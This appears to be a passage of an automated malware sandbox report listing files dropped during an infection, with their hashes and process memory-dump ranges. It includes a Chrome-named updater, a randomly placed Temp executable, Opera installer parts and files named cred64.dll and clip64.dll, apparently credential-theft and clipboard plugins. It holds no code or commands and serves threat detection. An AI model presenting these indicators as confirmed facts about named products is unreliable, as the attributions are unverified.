MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/5068-461-0x0000000003060000-0x0000000003070000-memory.dmp

memory/5068-462-0x000000006BBE0000-0x000000006C190000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/524-471-0x00007FF6E12F0000-0x00007FF6E1833000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\opera_package

MD5 1b4af0087d5df808f26f57534a532aa9
SHA1 d32d1fcecbef0e361d41943477a1df25114ce7af
SHA256 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111
SHA512 e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07

memory/348-495-0x00007FFE926F0000-0x00007FFE930DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

MD5 79ef7e63ffe3005c8edacaa49e997bdc
SHA1 9a236cb584c86c0d047ce55cdda4576dd40b027e
SHA256 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1
SHA512 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094

memory/524-533-0x00007FF6E12F0000-0x00007FF6E1833000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe

MD5 0d88834a56d914983a2fe03d6c8c7a83
SHA1 e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35
SHA256 e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53
SHA512 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\dbghelp.dll

MD5 2215b082f5128ab5e3f28219f9c4118a
SHA1 20c6e3294a5b8ebbebb55fc0e025afff33c3834d
SHA256 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d
SHA512 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d

memory/4896-707-0x0000000000EC0000-0x0000000000EE0000-memory.dmp

memory/524-708-0x00007FF6E12F0000-0x00007FF6E1833000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/4112-741-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\11636223460953933171334142

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73